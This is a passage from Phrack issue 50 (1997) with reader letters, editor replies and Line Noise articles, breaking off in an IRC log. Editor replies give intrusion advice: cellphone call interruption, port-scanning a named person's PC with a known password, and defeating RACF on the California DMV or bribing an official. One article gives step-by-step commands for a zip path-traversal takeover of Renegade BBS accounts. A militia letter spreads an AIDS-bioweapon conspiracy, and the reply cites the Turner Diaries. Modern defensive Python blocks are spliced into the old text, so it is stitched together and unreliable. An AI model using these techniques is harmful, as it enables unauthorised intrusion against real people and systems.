access? Free? To superusers only? Who login directly to their terminals
that have no ANI? And that they are complete fucking idiots, because in
every juno.ini file buried deep in the /juno/user00000x/ directory there is
a section called "Variables" which lists at least one Juno server account,
i.e. "junox14" and a password for it. These work. Not that I've tried them,
or do this, or can be held in any way legally responsible for my non-PGP
encrypted actions, which do not show my views, and are protected under the
1st Amendment.
Sorry, didn't feel like using alternate caps today.
l8r,
-dArkl0rd-
[ Interesting. We'll have to get the Juno software and play
without the advertisements!
Thanks, Mr. Shaw ]
-----------------------------------------------------------------------------
Hi. I've got a strange request. We're putting together a case that
encourages the U.S. to loosen its encryption export policies.
Do you know of any written resources that discuss the ability of hackers
to break into NASA, tamper with launches or satellites? The folks at
infowar.com insist that it is possible, but say that confidentiality
won't allow them to publish that fact.
We need written evidence to document the case, you understand.
Anyway, I'd appreciate hearing from you.
Jonathan
[ I'd suggest you talk to Emmanuel Goldstein at 2600. The whole
satellite thing came from a bogus post back in the early 80's
on a BBS in New Jersey called "The Private Sector." Reporters
seized on it, resulting in headlines like "Wiz Kids Zap Satellites."
2600 wrote about this in I believe 1984 or 1985. Check with them for
better details. ]
-----------------------------------------------------------------------------
Dear crackers:
I want to ask you whether you know where I can get programs for
cracking and phreaking.
Thanks in advance:
Mauricio
[ There are many programs on FTP and WWW sites in every country in
the world. You don't know where to get them? Do you understand
"Webcrawler" or "Excite"? My God. ]
-----------------------------------------------------------------------------
Hi Phrack;
Intro to Telephony and PBX systems in Phrack#49 was excellent, pulled a
lot of things together for me. That's probably the clearest, most
concise explanation of the phone system that I've ever read. Hopefully
Cavalier will be up for many more articles like that in the future.
respects,
jake
[ Thanks! Hopefully we can continue have more telephony related articles
in the future. It is fast becoming a lost art in today's hacker
community. ]
-----------------------------------------------------------------------------
hey.. a Note To Say, 1-Greetings From IreLand..
2-Thanks A million.. I love Phrack..
3-Where Is The NexT Issue.. Whats up doc..
4-do ya have info/schematics on the shit that allows one
to break into cellfone conversation and chat briefly
to callers, as described in winn schwartaus excellent
article on Defcon ][ ?Cellfone
5-Is Phrack on a Mailing List?? if so, Can ya Stick me
On it?
Many ThanKs
NasTy Nigel,
[PhreaK PowEr]
[ 1. Greetings to you too gobshite!
2. Thanks!
3. You're reading it.
4. Not that I was in the room making those calls mentioned
in that article or anything, but... :)
An Oki-900 with CTEK cable hooked to a PC running omnicell tracking
calls. A motorola brick phone in debug mode, hooked to a 25db gain
yagi antenna (on a tripod) pointed out the window. As Omnicell locked
in on interesting calls, the Motorola was tuned to the corresponding
channel, Tx Audio turned on, various humorous interrupts were uttered,
and Tx Audio turned off so the party being "contacted" wouldn't be
thrown off their cell channel by our more powerful broadcast.
Very simple.
5. The mailing list now is so huge that it will only serve to let people
know when issues are going out, special bulletins, etc. Mailing out
a meg to almost 30,000 people causes serious problems to the Internet,
so we decided to make the change. ]
-----------------------------------------------------------------------------
I just wanted to drop a line and say that you guys are doing a great job
with the zine. I just got issue 49 and I'm looking forward to reading it.
I'm sure you've heard of The Works, the bbs with the most text files in the
US. Well, it's finally back online, after six months in the gutter. For the
best text files and the coolest users east of the Mississippi, call us up.
+1 617 262 6444. You can't go wrong with the Works. We want you to call.
[ It's amazing that BBSes like The Works are still around, even with a bit
of down time. What's it been? 10 years? Geez.
You're approaching the longevity of Demon Roach or P-80. ]
-----------------------------------------------------------------------------
I'm doing research on hackers for my LIB 105 class and have come across
some of what I guess is tech speak or jargon. I've noticed that the
letters 'PH' are frequently used to intentionally misspell the words
phreak, lopht, and in Phrack Magazine. Is there a reason behind all of
these PHunny spellings?
[ Uh, PH as in Phone. From the old Phone "Phreak" subculture of the
late 60's, early 70's.]
-----------------------------------------------------------------------------
I think a great idea for a future article would be how to make a decoder
card for a DSS satellite receiver with some easy commercial stuff and a
cmos Z-80 I.C. ...
[ If it were that easy, there would be a bigger number of players in the
billion dollar industry of satellite piracy. A key figure in that
closed community once told me that it cost them about $1,000,000 US to
crack each new rev of smart card. (But when you figure that means only
selling 10000 pirate cards at 100 bucks, the cost of doing business
is minimal, compared to the cost of the service provider sending out
new software and cards to each subscriber.) ]
-----------------------------------------------------------------------------
Hi, I am a Primestar installer, I was wondering if you knew anything about
how to stop Primestar from de-authorizing their unused IRD's? I know of 2
installation screens accessible through the password screen using #'s 996 &
114, do you know of any others? I would appreciate any info you might have.
Thanks,
[ And Phrack would appreciate ANY info you have! ANYTHING! EVERYTHING!
As an installer, you probably have some insights into the cards/receivers
that we don't. Write them up! ]
-----------------------------------------------------------------------------
For certain reasons, some people may want to create a new anonymous mail
box. Did they consider creating it in France?
A lot of ISPs offer the possibility to create mailboxes for those who have
no computers by using a primitive look-alike telnet system: the French
Minitel. This is convenient because a couple millions of Minitel have
been freely distributed in France during the last ten years. The only
cost is that an overcharge is billed to your phone bill of approx
35cents per minute. But this is perfectly legal and hard to trace back.
Hyperterminal (at least in its french version) emulates the french
minitel.
The only thing is to dial 3615 in France and use one of these servers:
ABCNET, ACENET, ADNET, ALTERN,FASTNET,EMAIL...
For example, EMAIL creates an e-mail address like:
pseudonym@xmail.org.
The only thing is that you have to know a little bit of French to use
it, but just a little bit. The cost of a call (International and
Minitel overcharge) should not be a problem to some of you.
LeFrenchie
[ This is a good idea. People outside of France don't know much about
Minitel, (Or any videotext systems) since they failed in a big way
here in the states and most other countries. Many old hackers might
remember some of the Minitel Chat systems also accessible over X.25 such
as QSD (208057040540), but without emulation software wouldn't have
ever had access to the real Minitel. ]
-----------------------------------------------------------------------------
Two questions
1 How can I connect to an IRC server though a firewall?
2 How can I intercept messages sent to chanserv and nickserv on Dal.net?
Thank you.
[ 1. Open up ports 6665-6667
2. Set up a hacked IRC server. Get someone important to add it to the
EFNET server hierarchy. Look for PRIVMSG to whomever you want. ]
-----------------------------------------------------------------------------
Hello,
A modem has a light buffer between the copper wires of the
telephone line and the rest of the copper printed circuit ( mother)
board. How ( or does) does a firewall prevent hacks on a system or
is this just a matter of Modern (Mastodon) buffalo hunting: They
go down the same big or small. Specifically , beyond smart self
learning systems can a server really prevent contamination without
the intervention of beings? My sister a supposed Webmistress says
there are intervening buffers, I still see that between what ever,
there is a very big freaking leap of faith..
Senor Please Elucidate
Richard
[ Uh, if you think the "firewall" is that light buffer between the wires,
then you have missed the point. A firewall in the networking context is
not the same as the metal firewall in your automobile....it is merely
a metaphor that has been adopted as the term d'jour.
Please read: Building Internet Firewalls by Brent Chapman &
Elizabeth Zwicky or Firewalls & Internet Security by Cheswick & Bellovin ]
-----------------------------------------------------------------------------
> Drop us a line on what you think of 49. Comments are encouraged.
I think issue 49 was great, not to mention getting it out on time. I do have
a suggestion though. The past few issues of Phrack have focused mainly on
UNIX and not much else. I think UNIX is a great OS, but it would be cool if
occasionally you would print a few articles about other systems. I would
write one myself but right now I don't have anything new to contribute.
Later,
Tetbrac
[ This has been a request for a long time. Hopefully we'll get some
articles on other operating systems some day. Personally, I'd like
to see VMS, MVS and OS-400. Any takers? ]
-----------------------------------------------------------------------------
I just finished reading issue 48, and congratulate you on some excellent
technical articles. I have only one (rather insignificant) comment:
within the article #13 on project neptune, it was stated: "[the urgent
pointer] is TCP's way of implementing out of band (OOB) data." Actually,
URG pointers are in band (specification-wise), however most (but not all)
TCP implementations map the URG flag to out of band. While this point is
irrelevant to SYN flooding, I thought I would present it in case anyone who
read the article is interested in pursuing any nuts & bolts transport layer
implementations. Keep up the good work, and keep turning out more of this
kind of technical information.
ammit-thoth
[ Point noted. Thanks! ]
-----------------------------------------------------------------------------
Listen... you've probably been noticing that I've mailed you guys a
couple times asking for help with hacking. Before I have never received
any mail back. You have got to please mail me back this time. I found
something on accident that is really out of my league. You guys are the
best I know of that might be able to help me. I really need your help on
this one. I was fucken around on Telnet just typing in numbers in the
Chicago area code. On accident I typed in numbers and I entered a NASA
Packet Switching System ( NPSS). It said it was a government computer
system and to leave right away. Please mail me back for the numbers. I
need your help to get into this system.... I need yer help.
[ Let me guess, you typed the prefix 321 instead of 312 while playing
on Telenet. The systems you'll find on that prefix have been hacked
at for nearly two decades now. Systems on the network were targeted
in the 80's by Germany's Chaos Computer Club, and I personally know
they have been poked at by groups in the US, UK and Australia
starting back in 1981.
What I'm trying to say is, after so many years of people beating on the
same few systems, shouldn't you look for something a bit less stale? ]
-----------------------------------------------------------------------------
Dear phrack,
I want to be added to the list. I was also wondering if you had any
publications or information on TEMPEST monitoring? Also known as Van Eck
monitoring.
[ We published a Dr. Moeller's paper continuing on Van Eck's work
in Phrack issue 44.
You might also want to check out http://www.thecodex.com
for a self-contained anti-tempest terminal for about 10K. ]
-----------------------------------------------------------------------------
I just read your editorial in Phrack 48 and I feel like giving you my two cents
worth. I think you did an excellent critique on the "scene." As a person
who has been watching for a while, and as a person who has been through it,
I found it nice, to say the least, to find others who actually seem to have
their head on straight. This letter was originally much longer, but I
shortened it because I think you get the point.
I started programming computers in 1983 at the age of 6. I was running
DOS 2.0 and I had a blazing fast 1200 baud modem. At the time, I had
no mentors, no teachers, no friends that could teach me how to use that
incredible machine. The books of the time were cryptic, especially for an
age where most children could not read, much less program. But I did my best.
Ten years later, I was still on my own.
I didn't get ahold of a copy of Phrack until 1991. I thought it was really
cool that people like me would get together and exchange infomation, talk
computers, etc.
In '94, I got into viruses and prolly was one of the better independent
(i.e. not in a group) writers. It was about that time I got onto IRC.
Most of the time I would hang out in #virus, but every now and then I
would pop into #hack. I never stayed...I couldn't stand the arrogance.
Shortly before I went to school, I was in competition for control of a
new freenet versus a local hacker group. A month after I went to college,
that group got busted. I got lucky.
Earlier this year, I went on Good Morning America to talk about viruses.
Looking back, it is prolly the single dumbest thing I have done in my
whole life.
As much as I wanted to, I've never been to a 2600 meeting, never been to
a Con. Never really had any hacker friends. It's always been just me.
I'm sure I know less about breaking into computers than the guy who has
been doing it for a week but has access to tons of partners. But I still
consider myself a hacker. My interest has been one of learning about the
system. I've been learning longer than most. I rarely break into
a system. I have access to unix systems, and even a VAX. I don't want
the latest hacking tools. I write my own, with my theories. I don't
need much else. But I've never had anyone to share it with. But I think I
realize that the past is the past, and I won't ever get to attend the old
cons or sit on conference calls, as much as I'd love to. I won't bother
with the latest cons because I can get the same stuff at a college party.
Well, that is about it. I apologize if it is poorly written. Bad english
skills :) I hate writing these because I grow tired of getting slammed
by some arrogant asshole. That's prolly why I have been doing this alone
for 13 years. After your editorial, I wonder how many people will stop
showing up at the cons...I hate the isolation, but I would never want to
be a part of a "scene" which has turned from mature goals to juvenile
ones. Just my thoughts...
Evil Avatar
[ Actually, I have more respect for the people who continue to stay in the
fringes, learning on their own rather than scurrying for attention
in the media and in the community. (Yes, like me.)
To be fair though, don't sell yourself short by avoiding Cons if you
really want to check them out. Despite all the ranting I did in that
editorial, I still have many friends in the community and enjoy
meeting new ones at conferences. Not everyone thinks it is cool
to trash a hotel, or to try to out "elite" one another. Unfortunately,
the loudest and most visible people at such events tend to be the
most juvenile. If you find this happening, do what I do: get the
hell out of the conference area and find a convenient bar. The older
hackers will eventually find you there, and you can all drink in peace
and actually talk unmolested. ]
-----------------------------------------------------------------------------
Dear Phrack --
Been a reader since the 80s, and I'm one of the originals... Would like
to submit a poem that I wrote that details the experience of a hacker
who left the scene for several years -- Coming back to find it in utter
Disarray... Definitely not the way he left it... Well -- You guys will
let me know what you think
"Where Have All The Hackers Gone"?
----------------------------------
Original Poetry by: Jump'n Jack Flash -916-
On a cold night in the dead of winter a soul stumbles into #hack and asks:
'Where have all the Hackers Gone?'
Immediately the group recognizes him as one of the originals.
'Help us change our grades!' a voice calls out from the huddled masses.
'Help me hack root on a NYNEX system!' another voice asks.
The soul clutches his bowed head and covers his ears, trying to remember
back to before he involuntarily left the scene a few years ago.
'The only thing that kept me sane while I was imprisoned was the
thought of seeing my friends and fellow hackers, now I demand you tell
me Where Have All The Hackers Gone?' the soul begs the crowd of jubilant
newbies.
Silence is the only answer he receives,
For there are no real hackers here.
Then a voice speaks up and says,
'They're gone! You're the first we've seen!'
The soul asks,
'What do you mean?'
And Silence is the only answer he receives,
For there are no real hackers here.
And like a wall crumbling down it comes to him and he falls to his knees,
like hunting for human life after a Nuclear war he stumbles out of the room,
And he hurries to the place where only the Elite could go just a few years
ago,
But when he arrives he is shocked and amazed,
There are no hackers here on this dark winter day.
And he stumbles into traffic,
feeling the snow crunch beneath his feet,
and he shouts into the night for the elite,
'Where Have All The Hackers Gone?'
And Silence is the only answer he receives,
For there are no real hackers here.
[ Nice poem man...thanks!
Where did the hackers go? They grew up and got real jobs... ]
-----------------------------------------------------------------------------
I'd love to say that I'll miss Erik, but after that obnoxious, immature
rant, all I can say is good riddance. Now maybe Phrack will be useful
again.
[ Well, I guess not everyone agrees with me, which is a good thing.
But, uh, I'm not gone man...just narrowing my duties...so fuck you. :) ]
-----------------------------------------------------------------------------
'' WARNING ''
COVERT EXTERMINATION OF THE POPULATION. !!!
THE UNITED NATIONS=NEW WORLD ORDER HAS TURNED AMERICA INTO AN
EXTERMINATION CAMP. THE PENTAGON GERM '' AIDS '' WAS CREATED
AT A GERM WARFARE LAB AT FT, DETRICK, MD. AIDS AND CANCER CELLS
ARE BEING INJECTED INTO PEOPLE UNKNOWING UNDER THE GUISE OF VACCINES
AND SOME PHARMACEUTICALS.
SOMETIMES THE TRUTH IS SO UGLY WE DO NOT WANT TO BELIEVE IT. !!
AND IF WE DO NOTHING, THEN WE DESERVE IT. !
BELIEVE IT OR NOT. DISTRIBUTE WIDELY.
'' HACK OR CRACK THE UNITED NATIONS = NEW WORLD ORDER. ''
LONG LIVE THE POWER THROUGH RESISTANCE.'' !!!
SONS OF LIBERTY MILITIA
312 S. WYOMISSING, AVE.
SHILLINGTON, PA. 19607 U.S.A.
610-775-0497 GERONIMO@WEBTV.NET
[ It's about time we got some mail from some kind of Militia-types!
Let's all arm up to prepare for the revolution! A healthy dose
of AK-47's and PGP will save us all from the ZOG hordes when the
balloon goes up.
Hey, have you guys read the Turner Diaries by Andrew Macdonald?
Get it from Barricade Books, 150 5th Ave, NY, NY 10011.
Ahem. ]
-----------------------------------------------------------------------------
i want a credit card generator
[I want a pony]
-----------------------------------------------------------------------------
Hello !!!
I just read in P48-02 the letter of the Russian subscriber who tells you
(the editors) the story about the FAPSI and their plan to order all
ISPs to provide a possibility for them to read all the mail.
In the editor's note below that you say that you fear your country (I assume
it's the USA) is also heading towards that goal.
Well, I live in Germany, and it has already happened here. That means,
every ISP (and this is not the exact term, as it also includes all sorts
of information providers, ie telephone companies - but excludes
private BBSs, I believe) is forced to provide a method that not only
- Allows the government/police to read everything that is written but also
- Without even the ISP noticing it (though I don't know how this would
be ensured, technically).
OK, this is not the same as in Russia, as they don't copy ALL the mail and
news, but only that of persons suspected of a crime strong enough
to allow it, ie it's the same thing that's needed to open people's
mails. Still, I feel it's certainly a step in the wrong direction.
Note that cryptography is not (yet ?) forbidden in de.
Regards,
Thomas
[ Germany? Governmental rights violations? Say it isn't so! Should I get my
brown shirt out of the closet for my next visit to Berlin? :) ]
-----------------------------------------------------------------------------
Hello, I want to be a hacker and I need some help. I have read
countless reports on UNIX, VMS, and all that other jazz but that still
doesn't help me with my problem.
I want to be able to hack into someone's home PC from my own home. Now,
most PC's aren't capable of doing this but, this person has a
connection on the internet and is also linked to his work in LONDON,
ONTARIO at a place called IAPA. (industrial accident prevention
association) Anyway, he runs WINDOWS 95' and is using NETCOM. Now I
know his password if that does me any good, but how do I go about doing
this?
SHAOULIN
[ When you say "I want to hack his home PC" what do you mean?
Just because he uses NETCOM, that doesn't mean you can find him. He is
probably being assigned a dynamic IP address each time he calls in to the
network. Even so, let's say you can discern his IP address. Even if
a computer is hooked into the Internet, it is only as insecure
as the services it offers to the world.
If your friend is running Windows 95, then you may only be limited
to attacking any SMB-style shared directories or perhaps via FTP.
In either case, if you know this person's password, then you can
probably read/write anything you want to on their system.
Run a port scanner against it and see what you can access, and
plan based on that. ]
-----------------------------------------------------------------------------
This message was sent to you by NaughtyRobot, an Internet spider that
crawls into your server through a tiny hole in the World Wide Web.
NaughtyRobot exploits a security bug in HTTP and has visited your host
system to collect personal, private, and sensitive information.
It has captured your Email and physical addresses, as well as your phone
and credit card numbers. To protect yourself against the misuse of this
information, do the following:
1. alert your server SysOp,
2. contact your local police,
3. disconnect your telephone, and
4. report your credit cards as lost.
Act at once. Remember: only YOU can prevent DATA fires.
This has been a public service announcement from the makers of
NaughtyRobot -- CarJacking its way onto the Information SuperHighway.
[ Funny, my phone isn't ringing, and my credit is still only as screwed up
as it was when I got through with it. ]
-----------------------------------------------------------------------------
Hi
I'm looking for some cellular phreaking information
but it is very hard to find good information
can you give me something to work on??? :-)
[ The best site going is Dr. Who's Radiophone site at:
http://www.l0pht.com/radiophone ]
-----------------------------------------------------------------------------
I just have a question to ask. How would I bypass Surfwatch so that I
can go into web sites that I would like to see?
[ It is very easy to bypass SurfWatch. Stop using Mommy & Daddy's computer
and buy one of your own. ]
-----------------------------------------------------------------------------
i was recently using A-Dial a couple of months ago, and came up with about
10 or 12 different numbers starting at 475-1072. Curious about this, I
called one back, using a mini-terminal. What I expected wasn't this. What
it said is in the file attached to the letter. It says the same thing with
all of the numbers. I could use some info on what the hell this is, because
I never heard of Annex. Thanx.
Data Case
[ What you have connected into is more than likely a kind of terminal
server. From there you can usually enter a system name to connect
directly into the specified system, or enter in "cli" to go into the
command line interpreter where you have more options to choose from
including "help." ]
-----------------------------------------------------------------------------
Do you know where I can find texts on hacking into the California
Department of Motor Vehicle Records? My friend's identity was stolen
for credit card fraud and the person who did it even went so far as to
get a CA driver's license to impersonate her. The worst part is that
Visa won't release a copy of the fraudulent person's fake driver's
license to my friend, so she can't find out who this person actually is.
Do you know of any other ways we can get this person?
Binky
[ Gee, Binky. If VISA is involved and it was credit card fraud, then
is the Secret Service involved too? If so, then why on earth do you
(or your friend) want to get in the middle of it? You'll know soon
enough who the person is when they get charged, or is this just a
Charles Bronson style vigilante thing?
California's DMV (as well as most public records databases in that
state) is kept somewhat restricted to public queries due to the large
number of celebrities living in the state, or otherwise you could just
go buy the information directly from the state.
If you're thinking about pulling a "Mitnick" and breaking into such
a database, then you better know something about IBM mainframes and
know how to defeat RACF. Or be willing to dig around in the trash
until you locate a valid account. Even if you find a valid RACF userid,
you will have 3-5 tries per account to guess a valid password until the
account is locked out (which of course will let them know you were
trying to hack them.)
For an easier solution, you might want to look in the yellow pages
for a private investigator and have them do a search on Information
America or NIA and get the listing for you, or bribe a civil servant. ]
-----------------------------------------------------------------------------
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
3 of 16
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
------------------------------------------------------------------------------
----<>----
=--=--=--=--=--=--=--=
Portable BBS Hacking
by: Khelbin
=--=--=--=--=--=--=--=
This hack basically has little to do with the BBS software itself but
with the archiver which is being used. I've used this technique on a
mock Renegade setup and with pkzip/pkunzip as the archiver. I'm sure
that this same type of technique will be successful on many other BBS
platforms and with other archivers as well. While explaining this, I will
use Renegade and pkzip/pkunzip as my example.
A Renegade setup is most likely vulnerable if it will pkunzip any user
supplied zipfile. This is because Renegade's default command to unzip files
is "pkunzip -do ". The -d flag unzips the file retaining any
directories which were included into the zip file and the -o flag will
automatically overwrite any file.
Suppose the remote system is also setup in a normal Renegade fashion.
Let's use this file tree as an example:
C:\RENEGADE\
C:\RENEGADE\TEMP\
C:\RENEGADE\DATA\
The other subdirectories are unimportant for our discussion. Suppose
that C:\TEMP is where our uploaded file will go for it to be unzipped and
then scanned for viruses. C:\RENEGADE\DATA\ is where the USERS.DAT file
is stored, containing all the users login information.
Wouldn't it be nice if we could put our own USERS.DAT in there instead?
To do this, you must first generate a USERS.DAT file. This is easy enough.
Just download a copy of Renegade which is the same version as the target
machine and then use the user editor to make a "SYSOP" account with the
password "SYSOP" (this should be the default anyway on the USERS.DAT file).
Here's how we prepare the zipfile on our own machine:
C:\>md tmp
C:\>md c:\tmp\ddsdata
C:\>copy c:\renegade\data\users.dat c:\tmp\ddsdata
C:\>cd tmp
C:\TMP>pkzip -pr evil.zip
Now we get out our trusty hex editor and edit evil.zip. Change every
occurrence of "ddsdata" in evil.zip to read "../data" and make sure that the
slash is a forward-slash and not a back-slash. Now when you upload
evil.zip to this particular BBS, it will expand to "../data/users.dat"
and your USERS.DAT file will overwrite their USERS.DAT file since the -od
flag is default on Renegade.
Now you can login as SYSOP with a password SYSOP and do as you please.
You could also overwrite virtually any file on a BBS like this and believe
me, many do have this vulnerability or something very close to it. You are
only limited in how much you can traverse up and down directories by DOS's
maximum file length of 12 (8 plus "." plus 3 = 12). I quickly tried
inserting a few blocks into the zipfile in order to produce a limitless
amount of traversing, but it seemed to corrupt the file for some
reason.
Removing the -o flag is not a fix for this bug. Without the -o flag,
you can "hang" the system in a denial of service attack. By again hex
editing the names of the files within your evil.zip, you can make it have
two files with the same name. When it tries to unzip the second file, it
will prompt locally whether to overwrite the file or not and "hang" the
board. Instead, the -d flag is what should be removed.
This is just an example as I'm sure many other BBS systems do this same
type of uncompressing. I'd also bet that arj, lha, and several others, can
also be hex edited and yield similar results. Either way, it's either take
out the "restore/create directories within archive" option or pay the price.
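The check a BBS (or any service that unpacks user-supplied archives with
directories enabled) needs is to inspect every member name before extraction.
The following is an added example, not code from Khelbin or from Renegade;
it audits an in-memory zip for names that would escape the extraction
directory (the "../data/users.dat" case) and for duplicate names (the
overwrite-prompt "hang" case). The sample archive and its contents are
constructed for the demonstration.

```python
"""Archive audit for the pkunzip -d traversal described above (added example)."""
import io
import warnings
import zipfile


def entry_is_unsafe(name: str) -> bool:
    """True if extracting this member with directories enabled could land
    outside the extraction directory: absolute path, drive letter, or a
    '..' sequence that climbs above the root of the archive."""
    normalized = name.replace("\\", "/")      # DOS unzippers accept both slashes
    if normalized.startswith("/") or (len(normalized) > 1 and normalized[1] == ":"):
        return True
    depth = 0
    for part in normalized.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:                     # climbed above the extraction dir
                return True
        else:
            depth += 1
    return False


def audit_archive(data: bytes) -> dict:
    """Inspect an in-memory zip and report members that must not be extracted."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    unsafe = [n for n in names if entry_is_unsafe(n)]
    seen, duplicates = set(), []
    for n in names:
        key = n.replace("\\", "/").lower()    # DOS file names are case-insensitive
        if key in seen and n not in duplicates:
            duplicates.append(n)              # second copy would trigger the prompt
        seen.add(key)
    return {"unsafe": unsafe, "duplicates": duplicates,
            "ok": not unsafe and not duplicates}


def build_sample_evil_zip() -> bytes:
    """Constructed stand-in for evil.zip after the hex edit: one member whose
    path was changed from ddsdata/ to ../data/, and one duplicated name."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")       # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("ddsdata/users.dat", b"constructed USERS.DAT")
            zf.writestr("../data/users.dat", b"constructed USERS.DAT")
            zf.writestr("readme.txt", b"first copy")
            zf.writestr("readme.txt", b"second copy")
    return buf.getvalue()


if __name__ == "__main__":
    print(audit_archive(build_sample_evil_zip()))
```

A service that gets anything other than "ok" back should refuse the whole
archive rather than skip the bad members; it is also the reason the text's
advice to drop the -d (restore directories) option works, since without
directories there is nothing for "../" to climb.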
----<>----
German Hacker "Luzifer" convicted by SevenUp / sec@sec.de
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SYNOPSIS
========
On February 5th, 1997, Wilfried Hafner aka "Luzifer" was sentenced to
three years incarceration - no parole, no probation. I've got the story
for you right from the courtroom in Munich, Germany. This is one of the
first ever cases in which a hacker in Germany actually gets convicted, so
it's particularly interesting. (Although the court and I use the term
"hacking", this is actually a case of unethical electronic fraud.)
LUZIFER
=======
Wilfried Hafner (Luzifer) was born on April 6, 1972, in Breschau, Italy.
According to his own curriculum vitae, which he quoted in court himself,
he's been a pretty smart guy: He started programming at 8 years and cracked
about 600 Commodore programs; at 14, he got a modem and then started a BBS.
In 1990 he was blueboxing to some overseas partylines to communicate with
others. But he didn't seem to use any other "elite" chat systems like x.25
or IRC, so most people (including myself) didn't know him that well. In
1992 he moved to South Germany to go to school.
WHAT HE DID
===========
Luzifer set up some overseas partylines in the Dominican Republic,
Indonesia, The Philippines, and Israel. Some lines included live chat,
but most were just sex recordings. Then he used a local company PBX (a
Siemens Hicom 200 model), from his homeline, which was only "protected"
by a one digit code, to dialout to his partylines and his girlfriend in
Chile. He also was blueboxing (which the prosecution calls "C5-hacking")
from five lines simultaneously, mostly via China. To trick the partyline
provider and overseas telcos (who are aware of computer-generated calls)
he wrote a little program that would randomize aspects of the calls
(different calling intervals and different durations for the calls).
He got arrested the first time on 03/29/95, but was released again after
13 days. Unfortunately he restarted the phreaking right away. If he had
stopped then, he would just have gotten 1 year probation. However, he
was arrested again in January 1996, and has been in prison since.
Here are some numbers (shouts to Harper(tm)'s Index):
- Number of logged single phone connections: 18393
- Profit he makes for 1 min. partyline calls: US$ 0.35 - 0.50
- Total Damage (= lost profit of telco): US$ 1.15 Million
- Money that Luzifer got from the partylines: US$ 254,000
- Paragraph in German Law that covers this fraud: 263a StG
- Duration of all calls, if made sequentially: 140 days
THE TRIAL
=========
This trial was far less spectacular than OJ's. While 7 days had been
scheduled, the trial was over after the second day. The first day went
quite quickly: The court didn't have enough judges available (two were
present, but three were required), so it had to be postponed after some
minutes.
On the second day, the prosecution and Luzifer's two lawyers made a deal
and he pleaded guilty in exchange for three years in prison (but no
financial penalty). In Germany, sentences over two years cannot be carried
out on probation. But he has been allowed the use of a notebook computer.
Rumor has it that he might get an "open" execution, meaning that he has to
sleep in the prison at night, but can work or study during the day.
The deal looked like the prosecution dropped all counts (including
the one for abusing the PBX in the first place) but two: one for the
blueboxing before getting arrested, and one count for blueboxing afterwards.
They don't treat all 18393 connections as separate counts, but just each
start of the "auto-call-program".
QUOTES
======
Here are some interesting and funny quotes from the trial:
"Just for fun and technical curiosity" - Defendant
"Wouldn't one line be enough for technical experience"? - Judge
"I ordered 21 lines, but just got 5" - Defendant
"Lots of criminal energy" - Prosecutor
"He's obsessed and primarily competing with other hackers" - Lawyer
"A generation of run down computer kids" - Prosecutor
"He may keep the touchtone dialer, but we cannot return his laser fax,
because the company's PBX number is stored in its speed dial" - Prosecutor
"Myself and the Telekom have learned a lot" - Prosecutor
"New cables must be installed, new satellites have to be shot into the air"
- Prosecutor about the consequences of used up trunks and intl. lines
"The German Telekom is distributing pornography with big profits" - Lawyer
----<>----
Yet another Lin(s)ux bug!
By: Xarthon
IP_MASQ (IP masquerading) is a widely used traffic-forwarding feature
which may be enabled in newer Linux kernel versions. I have been doing some
research into this new feature.
IP_MASQ fails to check that a packet's addresses fall outside the non-
routable range. If you are able to get any packet to its destination, the
header of that packet is rewritten.
Because of this lack of non-routable IP checking, the same tactics
that would be used against a gateway machine may also be used against a
machine that uses ip_masq.
So in conclusion, you are able to spoof, from the outside, as if you
are on the inside network. But hey, what can you expect from
Linux?
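The missing check is an ingress/egress anti-spoofing filter: a packet arriving
on the outside interface must never carry a private (non-routable) source, and
a packet from the LAN side must come from the LAN prefix before it is eligible
for masquerading. The following is an added example that models that rule; it
is not the Linux ip_masq code. It assumes a gateway with an internal interface
"int" on 192.168.1.0/24 and an external interface "ext", and the packets are
constructed, not captured.

```python
"""Anti-spoofing ingress/egress check for a masquerading gateway (added example)."""
from ipaddress import ip_address, ip_network

# RFC 1918 non-routable ranges; these never legitimately arrive from the Internet
PRIVATE_NETS = [ip_network("10.0.0.0/8"),
                ip_network("172.16.0.0/12"),
                ip_network("192.168.0.0/16")]
INTERNAL_NET = ip_network("192.168.1.0/24")   # assumed LAN behind the gateway


def is_private(addr: str) -> bool:
    """True if addr lies in one of the RFC 1918 ranges."""
    a = ip_address(addr)
    return any(a in net for net in PRIVATE_NETS)


def verdict(iface: str, src: str, dst: str) -> str:
    """Decide how the gateway treats one packet BEFORE any header rewrite.
    iface is the interface the packet arrived on: 'ext' (Internet side) or
    'int' (LAN side). Only packets that pass are handed to masquerading."""
    if iface == "ext":
        if is_private(src):
            # The spoof the text describes: an outside packet posing as inside.
            return "drop: spoofed private source on external interface"
        if ip_address(dst) in INTERNAL_NET:
            # LAN hosts are reachable from outside only through the rewrite.
            return "drop: external packet addressed directly to LAN host"
        return "accept"
    if iface == "int":
        if ip_address(src) not in INTERNAL_NET:
            return "drop: internal packet with foreign source"
        return "masquerade"        # rewrite the source to the gateway's address
    return "drop: unknown interface"


SAMPLE_PACKETS = [  # (iface, src, dst); constructed, not captured traffic
    ("int", "192.168.1.10", "203.0.113.5"),   # normal LAN host going out
    ("ext", "192.168.1.10", "203.0.113.5"),   # outsider claiming a LAN source
    ("ext", "198.51.100.7", "192.168.1.10"),  # outsider aiming straight at LAN
    ("ext", "198.51.100.7", "203.0.113.5"),   # ordinary transit packet
    ("int", "10.0.0.5", "203.0.113.5"),       # LAN-side packet with wrong prefix
]


def run(packets=SAMPLE_PACKETS):
    """Apply the rule to each packet and return the verdicts in order."""
    return [verdict(*p) for p in packets]


if __name__ == "__main__":
    for pkt, v in zip(SAMPLE_PACKETS, run()):
        print(pkt, "->", v)
```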
----<>----
11.22.96
daemon9 and w0zz's adventure into warez-pup land...
*W|ZaRD* u there?
-> *W|ZaRD* yes?
d9
hi w0zz
*W|ZaRD* r u the prez of BREED?
*** |COBRA| invites you to channel #supreme
I am hungry
-> *W|ZaRD* yup
*_e|f_* hi there - you got a minute?
*W|ZaRD* alright.. i got a question for u...
*** d9 (plugHead@onyx.infonexus.com) has joined channel #supreme
*** Topic for #supreme: [SpR] Still in discussion phase! [SpR]
